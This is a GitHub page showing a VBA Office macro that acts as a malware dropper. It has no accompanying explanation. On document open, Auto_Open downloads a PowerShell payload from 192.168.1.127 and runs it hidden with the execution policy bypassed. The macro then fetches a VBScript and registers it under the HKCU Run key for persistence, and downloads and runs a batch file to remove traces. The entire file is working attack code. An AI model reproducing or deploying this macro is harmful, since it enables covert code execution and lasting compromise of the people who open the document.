-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathMacroCode
147 lines (111 loc) · 4.52 KB
/
MacroCode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
Sub Auto_Open()
Download
If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth = 32 Then
Execute32
Else
Execute64
End If
Persist
DropBat
RemovePayload
End Sub
Public Function Download() As Variant
Dim FileNum As Long
Dim FileData() As Byte
Dim MyFile As String
Dim WHTTP As Object
On Error Resume Next
Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5")
If Err.Number <> 0 Then
Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5.1")
End If
On Error GoTo 0
MyFile = "http://192.168.1.127/x32.ps1"
WHTTP.Open "GET", MyFile, False
WHTTP.Send
FileData = WHTTP.ResponseBody
Set WHTTP = Nothing
If Dir("C:\Temp", vbDirectory) = Empty Then MkDir "C:\Temp"
FileNum = FreeFile
Open "C:\Temp\payload.ps1" For Binary Access Write As #FileNum
Put #FileNum, 1, FileData
Close #FileNum
End Function
Public Function Execute32() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID
End Function
Public Function Execute64() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID
End Function
Public Function Persist() As Variant
Dim FileNum1 As Long
Dim FileData1() As Byte
Dim MyFile1 As String
Dim WHTTP1 As Object
Dim WshShell As Object
On Error Resume Next
Set WHTTP1 = CreateObject("WinHTTP.WinHTTPrequest.5")
If Err.Number <> 0 Then
Set WHTTP1 = CreateObject("WinHTTP.WinHTTPrequest.5.1")
End If
On Error GoTo 0
MyFile1 = "http://192.168.1.127/persist.vbs"
WHTTP1.Open "GET", MyFile1, False
WHTTP1.Send
FileData1 = WHTTP1.ResponseBody
Set WHTT1P = Nothing
If Dir("C:\Temp", vbDirectory) = Empty Then MkDir "C:\Temp"
FileNum1 = FreeFile
Open "C:\Temp\persist.vbs" For Binary Access Write As #FileNum1
Put #FileNum1, 1, FileData1
Close #FileNum1
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Persist", "C:\Temp\persist.vbs", "REG_SZ"
Set WshShell = Nothing
End Function
Public Function DropBat() As Variant
Dim FileNum2 As Long
Dim FileData2() As Byte
Dim MyFile2 As String
Dim WHTTP2 As Object
On Error Resume Next
Set WHTTP2 = CreateObject("WinHTTP.WinHTTPrequest.5")
If Err.Number <> 0 Then
Set WHTTP2 = CreateObject("WinHTTP.WinHTTPrequest.5.1")
End If
On Error GoTo 0
MyFile2 = "http://192.168.1.127/remove.bat"
WHTTP2.Open "GET", MyFile2, False
WHTTP2.Send
FileData2 = WHTTP2.ResponseBody
Set WHTTP2 = Nothing
If Dir("C:\Temp", vbDirectory) = Empty Then MkDir "C:\Temp"
FileNum2 = FreeFile
Open "C:\Temp\remove.bat" For Binary Access Write As #FileNum2
Put #FileNum2, 1, FileData2
Close #FileNum2
End Function
Public Function RemovePayload() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "C:\\WINDOWS\\system32\\cmd.exe /C C:\Temp\remove.bat", Null, objConfig, intProcessID
End Function